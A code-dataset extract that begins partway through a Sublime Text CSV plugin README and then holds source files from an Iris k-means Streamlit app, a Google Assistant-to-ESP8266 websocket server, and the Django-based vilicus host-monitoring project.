This is intentional, to match NumPy array slice syntax.\n\n- `[0:1,:]` Updates all cells in row 0.\n- `[1:3,:]` Updates all cells in rows 1 and 2.\n\nRow and column numbers in ranges may be prefixed with `+` or `-`, which makes them relative to the formula's location in the document.\n\n- `[:,-1]` Updates all cells in the column immediately to the left of the formula.\n- `[:,+1:+3]` Updates all cells in the two columns immediately to the right of the formula .\n\nFor convenience, the range may be shifted one cell in any direction by prefixing the `=` character with a direction modifier.\n\n- `<=` Updates the cell to the left of the formula.\n- `>=` Updates the cell to the right of the formula.\n- `^=` Updates the cell above the formula.\n- `v=` Updates the cell below the formula.\n\nThe range shift modifier may be used in conjunction with numeric ranges.\n\n- `[:]<=` Updates all cells in the column to the left of the formula.\n\n### Expression syntax\n\nThe Python expression is evaluated by Sublime Text's Python interpreter, for each cell in the target range. The result is then converted to a string and stored in the cell.\n\nSome variables are provided to the evaluator:\n\n- `m` A NumPy `ndarray` representing the document. Non-numeric cells are represented with 0. The array dimensions are padded to the maximum extents of the document, missing cells are filled in with 0. 
For a NumPy tutorial, see http://wiki.scipy.org/Tentative_NumPy_Tutorial.\n- `row` The row of the cell being evaluated.\n- `col` The column of the cell being evaluated.\n- `frow` The row of the formula.\n- `fcol` The column of the formula.\n\n## Examples\n\n### Example 1\n\nThis example applies a simple column sum using the NumPy `sum` method.\n\n\titem ,price\n\tshoes ,12\n\that ,2\n\tpants ,8\n\tshirt ,7.50\n\ttotal , ,\"<=m[1:5,1].sum()\"\n\n### Example 2\n\nThis example fills in totals by price and by item.\n\n\titem ,price ,qty ,total\n\tshoes ,12 ,2 ,\n\that ,2 ,1 ,\n\tpants ,8 ,1 ,\n\tshirt ,7.50 ,2 ,\n\ttotal , , ,\n\t\"[5,1:4]=m[1:5,col].sum()\"\n\t\"[1:5,3]=m[row,1]*m[row,2]\"\n\nNote that it must be evaluated (`Ctrl+Comma, Equals`) twice to calculate the last cell.\n\n# License\n\nAll of Sublime Text Advanced CSV Plugin is licensed under the MIT license.\n\nCopyright (c) 2014 Wade Brainerd <[email protected]>\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\nFurther, portions of the code taken from Eric Martel's Sublime Text 2 plugin are licensed as follows:\n\nAll of Sublime Text 2 CSV Plugin is licensed under the MIT license.\n\nCopyright (c) 2012 Eric Martel <[email protected]>\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n" } ]
2
Kes-trel/Iris-Flower-Cluster-Analysis
https://github.com/Kes-trel/Iris-Flower-Cluster-Analysis
7bdb4f8ff66ed17c64f6dc8681ef3d813338b19b
6e0b67cf73b5cb0f2a148a8fe2f7542737b4814a
d797b105862e91f5d79e144304f15787185fb1c9
refs/heads/main
2023-05-26T21:01:31.274568
2021-06-18T14:50:56
2021-06-18T14:50:56
377,849,606
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7075919508934021, "alphanum_fraction": 0.7241992950439453, "avg_line_length": 45.20547866821289, "blob_id": "1e799e1879db0a24f1a82efea65492aa899a3dfc", "content_id": "f5ec90747dc1da86b4d74d6832e8ca9b1c78c648", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3375, "license_type": "no_license", "max_line_length": 248, "num_lines": 73, "path": "/app.py", "repo_name": "Kes-trel/Iris-Flower-Cluster-Analysis", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport streamlit as st\nimport seaborn as sns\nsns.set()\n\nfrom functions import screen_data, scater_plot, elbow_method, cluster_data, scale_cluster_data\n\nraw_data = pd.read_csv(\"iris_with_species.csv\")\n\nst.set_page_config(page_title=\"Species Segmentation with Cluster Analysis\",page_icon=\"🌼\", layout=\"wide\", initial_sidebar_state=\"auto\")\n\ncol_a, col_b = st.beta_columns([4,1])\ncol_a.title(\"Iris flower data set\")\ncol_a.header(\"Species Segmentation with Cluster Analysis (KMeans)\")\ncol_b.image(\"https://upload.wikimedia.org/wikipedia/commons/thumb/0/05/Scikit_learn_logo_small.svg/1200px-Scikit_learn_logo_small.svg.png\")\n\nshow_real_data = st.sidebar.checkbox(\"Show real data\", help=\"Test some clusters yourself first\")\n\nwidth = st.sidebar.slider(\"Plot width\", min_value=1, max_value=25, step=1, value=12, format=\"%i\")\nheight = st.sidebar.slider(\"Plot height\", min_value=1, max_value=25, step=1, value=5, format=\"%i\")\nplot_size = (width, height)\n\npetals_or_sepals = st.sidebar.radio(\"Select data for analysis\", [\"sepal\", \"petal\"])\n\nscale_data_box = st.sidebar.checkbox(\"Scale Data\", help=\"Standardize features by removing the mean and scaling to unit variance. 
For more info read here: https://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.StandardScaler.html#\")\n\ntest_clusters = st.sidebar.number_input(\"Test clusters\", value=1, min_value=1, step=1, format=\"%i\")\n\n\ndata_screen = screen_data(data=raw_data, petal_sepal=petals_or_sepals)\n\nif scale_data_box:\n data = scale_cluster_data(data=data_screen, number_of_clusters=test_clusters)\nelse:\n data = cluster_data(data=data_screen, number_of_clusters=test_clusters)\n\nreal_results = raw_data.copy()\nreal_results[\"clusters\"] = real_results[\"species\"].map({\"setosa\":0, \"versicolor\":1 , \"virginica\":2})\n\nif show_real_data:\n col1, col2 = st.beta_columns(2)\n col1.subheader(\"Your analysis\")\n col1.pyplot(scater_plot(data=data, value=petals_or_sepals, size=plot_size))\n \n col2.subheader(\"Real data\")\n col2.pyplot(scater_plot(data=real_results, value=petals_or_sepals, size=plot_size))\nelse:\n st.pyplot(scater_plot(data=data, value=petals_or_sepals, size=plot_size))\n\nif st.sidebar.checkbox(\"Get a hint with Elbow Method\"):\n number_of_cluster_elbow = st.sidebar.number_input(\"Select number of cluster\", value=5, min_value=1, step=1, format=\"%i\", help=\"\"\"Cluster number keeps track the highest number of clusters we want to use the WCSS method for.\n More info https://en.wikipedia.org/wiki/Elbow_method_(clustering)\"\"\")\n\n st.pyplot(elbow_method(data=data, clusters=number_of_cluster_elbow, size=plot_size))\n\nconclusion = \"\"\"\n The original dataset has 3 sub-species of the Iris flower. 
Therefore, the number of clusters is 3.\n Read more here: https://en.wikipedia.org/wiki/Iris_flower_data_set\n \n This shows us that:\n\n * the Eblow method is imperfect (we might have opted for 2 or even 4 clusters)\n * k-means is very useful in moments where we already know the number of clusters - in this case: 3\n * biology cannot be always quantified \n \"\"\"\n\niris = \"https://upload.wikimedia.org/wikipedia/commons/thumb/4/41/Iris_versicolor_3.jpg/1280px-Iris_versicolor_3.jpg\"\n\nif show_real_data:\n with st.beta_expander(\"Iris flower data set\"):\n col_1, col_2 = st.beta_columns([2,1])\n col_1.write(conclusion)\n col_2.image(iris)" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.7093023061752319, "avg_line_length": 16.399999618530273, "blob_id": "7a26f50eb9320e6705e1c178b56662da1079c676", "content_id": "6e60aaf3cec8f06b528a8fbed749192ee66c7f19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 86, "license_type": "no_license", "max_line_length": 20, "num_lines": 5, "path": "/requirements.txt", "repo_name": "Kes-trel/Iris-Flower-Cluster-Analysis", "src_encoding": "UTF-8", "text": "streamlit==0.82.0\npandas==1.2.4\nmatplotlib==3.4.2\nseaborn==0.11.1\nscikit-learn==0.24.2" }, { "alpha_fraction": 0.6384053826332092, "alphanum_fraction": 0.6423357725143433, "avg_line_length": 29.724138259887695, "blob_id": "352ef1fd95bc384a41cd50deceac545a68517db0", "content_id": "610d6c2145608daeeda4d350fef2dcdb49b30bd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1781, "license_type": "no_license", "max_line_length": 86, "num_lines": 58, "path": "/functions.py", "repo_name": "Kes-trel/Iris-Flower-Cluster-Analysis", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\nfrom sklearn import preprocessing\n\ndef screen_data(petal_sepal, data):\n data_select = data.copy()\n if petal_sepal == \"sepal\":\n 
data_select = data.iloc[:, :-3]\n return data_select\n elif petal_sepal == \"petal\":\n data_select = data.iloc[:, 2:-1]\n return data_select\n\ndef scater_plot(data, value, size):\n x_values = f\"{value}_length\"\n y_values = f\"{value}_width\"\n x_label = f\"Length of {value}\"\n y_label = f\"Width of {value}\"\n fig, ax = plt.subplots(figsize=size)\n if \"clusters\" in data.columns:\n ax.scatter(data[x_values], data[y_values], c=data[\"clusters\"], cmap=\"rainbow\")\n else:\n ax.scatter(data[x_values], data[y_values])\n plt.xlabel(x_label)\n plt.ylabel(y_label)\n return fig\n\ndef elbow_method(clusters, data, size):\n wcss = list()\n for c in range(1, clusters+1):\n kmeans = KMeans(c)\n kmeans.fit(data)\n wcss_iter = kmeans.inertia_\n wcss.append(wcss_iter)\n fig, ax = plt.subplots(figsize=size)\n ax.plot(range(1, clusters+1), wcss)\n plt.title('The Elbow Method')\n plt.xlabel('Number of clusters')\n plt.ylabel('Within-cluster Sum of Squares')\n return fig\n\ndef cluster_data(number_of_clusters, data):\n data_c = data.copy()\n kmeans = KMeans(number_of_clusters)\n kmeans.fit(data_c)\n data_c[\"clusters\"] = kmeans.fit_predict(data_c)\n return data_c\n\ndef scale_cluster_data(number_of_clusters, data):\n scaler = preprocessing.StandardScaler()\n scaler.fit(data)\n data_scaled = scaler.transform(data)\n\n data_c = data.copy()\n kmeans = KMeans(number_of_clusters)\n kmeans.fit(data_scaled)\n data_c[\"clusters\"] = kmeans.fit_predict(data_scaled)\n return data_c" }, { "alpha_fraction": 0.8461538553237915, "alphanum_fraction": 0.8461538553237915, "avg_line_length": 31.5, "blob_id": "619ebe14fed18ae3ab57310b18f648ab4a81b72b", "content_id": "85698a06ff3c4a172545f3b10db7ba587e934b39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 65, "license_type": "no_license", "max_line_length": 33, "num_lines": 2, "path": "/README.md", "repo_name": "Kes-trel/Iris-Flower-Cluster-Analysis", "src_encoding": "UTF-8", "text": 
"# Iris-Flower-Cluster-Analysis\nSpecies segmentation using KMeans\n" } ]
4
Nishant147/Google-IOT
https://github.com/Nishant147/Google-IOT
efba30f46eee625454e883d1ddbf91d6261b20a7
d079bcfd2bd56955d979262475170cd237df7e93
f776a643188a5cb2c66d61e34a257a4410ee083c
refs/heads/master
2020-03-25T13:19:54.895521
2018-08-07T04:59:03
2018-08-07T04:59:03
143,819,841
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.760617733001709, "alphanum_fraction": 0.7760617733001709, "avg_line_length": 50.79999923706055, "blob_id": "444d85a0af965f68f6381a065f37aed2eb23a5e3", "content_id": "eb5dbf88134362bf537bca96dcf4312bcd3b65b7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 259, "license_type": "permissive", "max_line_length": 102, "num_lines": 5, "path": "/README.md", "repo_name": "Nishant147/Google-IOT", "src_encoding": "UTF-8", "text": "# Google-IOT\nPython Web app to communicate with Google Assistant API &amp; Websocket that communicates with ESP8266\n\nDeploy this project to Heroku by clicking this button\n [![Deploy](https://www.herokucdn.com/deploy/button.svg)](https://heroku.com/deploy)\n" }, { "alpha_fraction": 0.5589622855186462, "alphanum_fraction": 0.5627948045730591, "avg_line_length": 33.61224365234375, "blob_id": "281bd5c7cd8bdde8550b12dbc5fcf92f7231ead9", "content_id": "0dfef711153a7c516e6e9207b8537ff36e48630b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3392, "license_type": "permissive", "max_line_length": 105, "num_lines": 98, "path": "/app.py", "repo_name": "Nishant147/Google-IOT", "src_encoding": "UTF-8", "text": "import websockets\nimport asyncio\nimport json\nimport time, os\n\nclass HttpWSSProtocol(websockets.WebSocketServerProtocol):\n rwebsocket = None\n rddata = None\n async def handler(self):\n try:\n request_line, headers = await websockets.http.read_message(self.reader)\n method, path, version = request_line[:-2].decode().split(None, 2)\n #websockets.accept()\n except Exception as e:\n print(e.args)\n self.writer.close()\n self.ws_server.unregister(self)\n raise\n\n # TODO: Check headers etc. 
to see if we are to upgrade to WS.\n if path == '/ws':\n # HACK: Put the read data back, to continue with normal WS handling.\n self.reader.feed_data(bytes(request_line))\n self.reader.feed_data(headers.as_bytes().replace(b'\\n', b'\\r\\n'))\n\n return await super(HttpWSSProtocol, self).handler()\n else:\n try:\n return await self.http_handler(method, path, version)\n except Exception as e:\n print(e)\n finally:\n\n self.writer.close()\n self.ws_server.unregister(self)\n\n\n async def http_handler(self, method, path, version):\n response = ''\n try:\n googleRequest = self.reader._buffer.decode('utf-8')\n googleRequestJson = json.loads(googleRequest)\n\n #{\"location\": \"living\", \"state\": \"on\", \"device\": \"lights\"}\n if 'what' in googleRequestJson['result']['resolvedQuery']:\n ESPparameters = googleRequestJson['result']['parameters']\n ESPparameters['query'] = '?'\n else:\n ESPparameters = googleRequestJson['result']['parameters']\n ESPparameters['query'] = 'cmd'\n # send command to ESP over websocket\n if self.rwebsocket== None:\n print(\"Device is not connected!\")\n return\n await self.rwebsocket.send(json.dumps(ESPparameters))\n\n #wait for response and send it back to API.ai as is\n self.rddata = await self.rwebsocket.recv()\n #{\"speech\": \"It is working\", \"displayText\": \"It is working\"}\n print(self.rddata)\n state = json.loads(self.rddata)['state']\n self.rddata = '{\"speech\": \"It is turned '+state+'\", \"displayText\": \"It is turned '+state+'\"}'\n\n response = '\\r\\n'.join([\n 'HTTP/1.1 200 OK',\n 'Content-Type: text/json',\n '',\n ''+self.rddata+'',\n ])\n except Exception as e:\n print(e)\n self.writer.write(response.encode())\n\ndef updateData(data):\n HttpWSSProtocol.rddata = data\n\nasync def ws_handler(websocket, path):\n game_name = 'g1'\n try:\n HttpWSSProtocol.rwebsocket = websocket\n await websocket.send(json.dumps({'event': 'OK'}))\n data ='{\"empty\":\"empty\"}'\n while True:\n data = await websocket.recv()\n 
updateData(data)\n except Exception as e:\n print(e)\n finally:\n print(\"\")\n\n\n\nport = int(os.getenv('PORT', 5687))\nstart_server = websockets.serve(ws_handler, '', port, klass=HttpWSSProtocol)\n# logger.info('Listening on port %d', port)\n\nasyncio.get_event_loop().run_until_complete(start_server)\nasyncio.get_event_loop().run_forever()\n" } ]
2
sjkingo/vilicus
https://github.com/sjkingo/vilicus
b29859aa7729d41eb7a2baa5b669d1e5e8a092ad
597f1bf92f1f28b1910a82d4e4194c351c612eca
d89d6687df6d84104ca608eb4db32fec3fac4d98
refs/heads/master
2022-07-26T09:54:59.567697
2014-11-18T21:39:38
2014-11-18T21:39:38
14,829,085
1
0
null
2013-11-30T21:59:01
2018-03-24T17:50:29
2022-07-06T19:49:43
JavaScript
[ { "alpha_fraction": 0.6583054661750793, "alphanum_fraction": 0.6616499423980713, "avg_line_length": 25.776119232177734, "blob_id": "0316354f7380ada0a6ad894ba461c1971600f476", "content_id": "87cad221cebfb9d895c0edb96f2e2b39ef9485bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1794, "license_type": "no_license", "max_line_length": 69, "num_lines": 67, "path": "/manager/api/resources.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "from tastypie import fields\nfrom tastypie.api import Api\nfrom tastypie.authorization import Authorization\nfrom tastypie.resources import ModelResource, ALL, ALL_WITH_RELATIONS\nfrom tastypie.serializers import Serializer\n\nfrom manager.models import *\n\nv1_api = Api(api_name='v1')\n\nclass AgentResource(ModelResource):\n class Meta:\n queryset = Agent.objects.all()\n filtering = {\n 'id': ALL,\n }\n\n allowed_methods = ['get', 'put']\n authorization = Authorization()\n serializer = Serializer()\n\nv1_api.register(AgentResource())\n\nclass WindowsServiceResource(ModelResource):\n agent = fields.ForeignKey(AgentResource, 'agent')\n\n class Meta:\n queryset = WindowsService.objects.all()\n filtering = {\n 'agent': ALL_WITH_RELATIONS,\n }\n\n allowed_methods = ['get']\n authorization = Authorization()\n serializer = Serializer()\n\nv1_api.register(WindowsServiceResource())\n\nclass WindowsServiceLogResource(ModelResource):\n service = fields.ForeignKey(WindowsServiceResource, 'service')\n\n class Meta:\n queryset = WindowsServiceLog.objects.all()\n filtering = {\n 'service': ALL_WITH_RELATIONS,\n }\n\n allowed_methods = ['get', 'post']\n authorization = Authorization()\n serializer = Serializer()\n\nv1_api.register(WindowsServiceLogResource())\n\nclass PerformanceLogEntryResource(ModelResource):\n agent = fields.ForeignKey(AgentResource, 'agent')\n\n class Meta:\n queryset = PerformanceLogEntry.objects.all()\n filtering = {\n 'agent': 
ALL_WITH_RELATIONS,\n }\n\n allowed_methods = ['post']\n authorization = Authorization()\n serializer = Serializer()\n\nv1_api.register(PerformanceLogEntryResource())\n" }, { "alpha_fraction": 0.7899159789085388, "alphanum_fraction": 0.7899159789085388, "avg_line_length": 34.70000076293945, "blob_id": "56a4fadd8462eff3d5236fa56622530ccfc57bef", "content_id": "4f0ba89939a8e2f82d2fe37be287c77e4b4a0101", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 357, "license_type": "no_license", "max_line_length": 75, "num_lines": 10, "path": "/manager/signals.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "import datetime\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\nfrom manager.models import WindowsServiceLog\n\n@receiver(post_save, sender=WindowsServiceLog)\ndef update_last_checkin(sender, **kwargs):\n kwargs['instance'].service.agent.last_checkin = datetime.datetime.now()\n kwargs['instance'].service.agent.save()\n" }, { "alpha_fraction": 0.7190082669258118, "alphanum_fraction": 0.7190082669258118, "avg_line_length": 29.25, "blob_id": "1d567971781b98342c63219276c3dc4f6c99e16b", "content_id": "8b6227594b2207236f3c1389750aa7649c2b3b96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 121, "license_type": "no_license", "max_line_length": 89, "num_lines": 4, "path": "/agent/README.md", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "Vilicus Agents\n==============\n\nThe Windows agent for Vilicus is available at https://github.com/sjkingo/VilicusAgent-win\n" }, { "alpha_fraction": 0.5394191145896912, "alphanum_fraction": 0.7095435857772827, "avg_line_length": 17.538461685180664, "blob_id": "70f5853ecbdd78a62e11819d43d5550bcab25797", "content_id": "6c04362eeecf3531914567891f5407a13ff7447c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", 
"length_bytes": 241, "license_type": "no_license", "max_line_length": 27, "num_lines": 13, "path": "/requirements.txt", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "Django==1.7.1\ndefusedxml==0.4.1\ndjango-debug-toolbar==1.2.2\ndjango-grappelli==2.6.2\ndjango-tastypie==0.12.1\nlxml==3.4.0\nmimeparse==0.1.3\npsycopg2==2.5.4\npython-dateutil==2.2\npython-mimeparse==0.1.4\nsix==1.8.0\nsqlparse==0.1.13\nwsgiref==0.1.2\n" }, { "alpha_fraction": 0.6513994932174683, "alphanum_fraction": 0.6641221642494202, "avg_line_length": 29.153846740722656, "blob_id": "6760ba338f1ea8c0d30d1d377cf3aac976c72742", "content_id": "eb908bd23ab13a1d895b41ebe53105d1ecf00a04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 393, "license_type": "no_license", "max_line_length": 48, "num_lines": 13, "path": "/notify_pushover/models.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "from django.db import models\n\nclass PushoverUserTokens(models.Model):\n email = models.EmailField(max_length=254)\n token = models.CharField(max_length=30)\n description = models.TextField(blank=True)\n\n class Meta:\n verbose_name = 'Pushover user token'\n verbose_name_plural = verbose_name + 's'\n\n def __unicode__(self):\n return self.email + ': ' + self.token\n\n" }, { "alpha_fraction": 0.7794561982154846, "alphanum_fraction": 0.7794561982154846, "avg_line_length": 35.77777862548828, "blob_id": "efcb6d6a7a369994dbb44b9fa68ab045234cc7cb", "content_id": "04e5f2c97cd1e83d209daa4b7eba2e7b3988c10e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 331, "license_type": "no_license", "max_line_length": 102, "num_lines": 9, "path": "/notify_pushover/__init__.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "from django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\n\n_token_key = 'NOTIFY_PUSHOVER_API_TOKEN' \nif 
not hasattr(settings, _token_key):\n raise ImproperlyConfigured(_token_key + ' is missing but is required for the notify_pushover app')\nTOKEN_KEY = getattr(settings, _token_key)\n\nimport signals\n" }, { "alpha_fraction": 0.7851002812385559, "alphanum_fraction": 0.7851002812385559, "avg_line_length": 57.16666793823242, "blob_id": "93594cad0f2847ab083ed75291c1b94b5a1980f3", "content_id": "fedee63aba31b81d501e26f1e5e1a6ba5b51d389", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 349, "license_type": "no_license", "max_line_length": 95, "num_lines": 6, "path": "/notify_pushover/README.md", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "This app provides Android push notifications via the [Pushover](https://pushover.net/) service.\n\nYou need to add the `NOTIFY_PUSHOVER_API_TOKEN` configuration option to `local_settings.py` for\nthis to work, and register users in the `PushoverUser` model.\n\nMake sure you run `pip install -r notify_pushover/requirements.txt` to add the dependencies.\n" }, { "alpha_fraction": 0.5925925970077515, "alphanum_fraction": 0.5925925970077515, "avg_line_length": 19.25, "blob_id": "7a95ecee86303a9d1f6f073b859ea3b3d6396242", "content_id": "7ef4038257f1acd9b318358be4ba72d0b26f095d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 243, "license_type": "no_license", "max_line_length": 48, "num_lines": 12, "path": "/dashboard/static/js/dashboard.js", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "$(document).ready(function() {\n\n$('div.summary').click(function() {\n $(this).next().slideToggle();\n $(this).toggleClass('selected');\n});\n\n$('a.click-collapse').click(function() {\n $(this).parents('div.detail').slideToggle();\n});\n\n});\n" }, { "alpha_fraction": 0.6673095226287842, "alphanum_fraction": 0.6692382097244263, "avg_line_length": 38.88461685180664, "blob_id": 
"b17be993c800d50828e502a01c2f62afe34cf41a", "content_id": "9c70eb18b727f6b8efc5692564861f36942827d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1037, "license_type": "no_license", "max_line_length": 114, "num_lines": 26, "path": "/notify_pushover/signals.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "from django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\nfrom manager.models import WindowsServiceLog\nfrom send import *\n\nclass LastStatusDummy(object):\n actual_status = '(None)'\n\n@receiver(post_save, sender=WindowsServiceLog)\ndef log_post_save(sender, **kwargs):\n inst = kwargs['instance']\n if inst.service.changed_since_last:\n status_now = inst.service.latest_log_entries[0]\n try:\n last_status = inst.service.latest_log_entries[1]\n except IndexError:\n last_status = LastStatusDummy()\n\n title = '{name} is now {now}'.format(name=inst.service, now=status_now.actual_status)\n msg = 'The service {name} running on {agent} has just changed status from {last} -> {now} at {dt}'.format(\n name=inst.service, agent=inst.service.agent.hostname, \n last=last_status.actual_status, now=status_now.actual_status,\n dt=status_now.timestamp)\n\n send_push_notification(title, msg, priority=PRIORITY['HIGH'])\n" }, { "alpha_fraction": 0.6733524203300476, "alphanum_fraction": 0.6790831089019775, "avg_line_length": 25.846153259277344, "blob_id": "623902a9b9df7c12c26619123307807de908b73e", "content_id": "1e2ed0cfb724bf5012a4495e8dfec0da58fc87ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 349, "license_type": "no_license", "max_line_length": 51, "num_lines": 13, "path": "/vilicus/urls.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nfrom manager.api.resources import 
v1_api\n\nurlpatterns = patterns('',\n (r'^grappelli/', include('grappelli.urls')),\n (r'^admin/', include(admin.site.urls)),\n (r'^api/', include(v1_api.urls)),\n (r'^', include('dashboard.urls')),\n)\n" }, { "alpha_fraction": 0.572519063949585, "alphanum_fraction": 0.576793909072876, "avg_line_length": 37.988094329833984, "blob_id": "447b9b682c9693eedf21953bc0bbcd12e42afc34", "content_id": "5733e9802b034c928dbbdd879f8a8476d2d1e64a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3275, "license_type": "no_license", "max_line_length": 105, "num_lines": 84, "path": "/README.md", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "vilicus - A Python network and host monitoring system\n=====================================================\n\nvilicus is a system designed to monitor and alert to problems with network\ninfrastructure and hosts. For example it can notify when a process is no longer\nrunning, or monitor the CPU utilisation of a machine and alert if it is\nsustained above a threshold.\n\nIt can be compared to bigger tools such as Nagios and NetXMS, but on a far\nsmaller scale. \n\nIt supports Android push notifications via the Pushover service.\n\nTerminology\n-----------\n\n- *check*: a check is a configured object to monitor, such as a running process or a CPU\nthreshold.\n\n- *server*: the netmon server runs with a database backend and exposes an API for agents to\ncontact and report on configured checks.\n\n- *agent*: an agent runs on each host to be monitored and reports back to the server with details of\nits configured checks.\n\nArchitecture/design\n-------------------\n\nEach agent is completely stateless, getting most of its configuration and all\nof its configured checks from the server at statup. This means its footprint is\ntiny and requires only minimal dependencies.\n\nHere is a simplified diagram of how the system works;\n\n```\n\n +--------+ 4. 
server sends notifications if needed +-----------------+\n /--------------------------> | server | ------------------------------------------> | email to admins |\n | +--------+ +-----------------+\n | |\n | | 1. agent contacts server and\n | | and downloads list of all\n | 3. agent submits result | configured checks for itself\n | of checks to server |\n | and \"checks in\", +-------+ 2. agent runs checks +---------------------+\n | meaning it has | agent | <-------------------------> | is process running? |\n | completed its checks +-------+ +---------------------+\n | |\n | |\n | |\n \\-------------------------------/\n\n```\n\nCommunication between agents and server is done via\n[REST](https://en.wikipedia.org/wiki/Representational_state_transfer) requests.\nSince it uses HTTP, an agent and the server can be on the same machine, on the\nsame network, or across the Internet. An agent simply requires HTTP access over\nport 80 to the server. A sample of the interaction between agent and server is\ngiven below:\n\n```\n GET /api/v1/agent/\n ^ fetch the agent object (this also verifies access)\n\n GET /api/v1/process_check/\n ^ get a list of this agent's process checks\n\n POST /api/v1/check_history/\n POST /api/v1/check_history/\n POST /api/v1/check_history/\n ^ post the results back to the server, one for each check (3 are configured)\n\n PUT /api/v1/agent/1/\n ^ checkout - signal to the server the agent has finished its checks for this run\n```\n\nThe server never contacts any of its agents, rather each agent contacts the\nserver as it is assumed to be at a fixed address.\n\nDependencies\n------------\n\n- Server: see [requirements.txt](requirements.txt)\n" }, { "alpha_fraction": 0.730434775352478, "alphanum_fraction": 0.730434775352478, "avg_line_length": 27.75, "blob_id": "b9d7c4c27435b4317359d2401eec42b5a2489838", "content_id": "8cc794af9d1597fa11e8ea08672be1db36203700", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 230, "license_type": "no_license", "max_line_length": 50, "num_lines": 8, "path": "/dashboard/views.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\n\nfrom manager.models import *\n\ndef dashboard(request, template='dashboard.html'):\n agents = Agent.objects.all()\n context = {'agents': agents}\n return render(request, template, context)\n" }, { "alpha_fraction": 0.5763813853263855, "alphanum_fraction": 0.5839653015136719, "avg_line_length": 26.969696044921875, "blob_id": "ea050d44d738cf82d7e3ff481a9e6bbe59e405a5", "content_id": "d7708d72a446c212e6ed590ff05971513a4d14ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 923, "license_type": "no_license", "max_line_length": 97, "num_lines": 33, "path": "/chartjs/templatetags/chartjs.py", "repo_name": "sjkingo/vilicus", "src_encoding": "UTF-8", "text": "from django import template\nfrom django.utils.safestring import 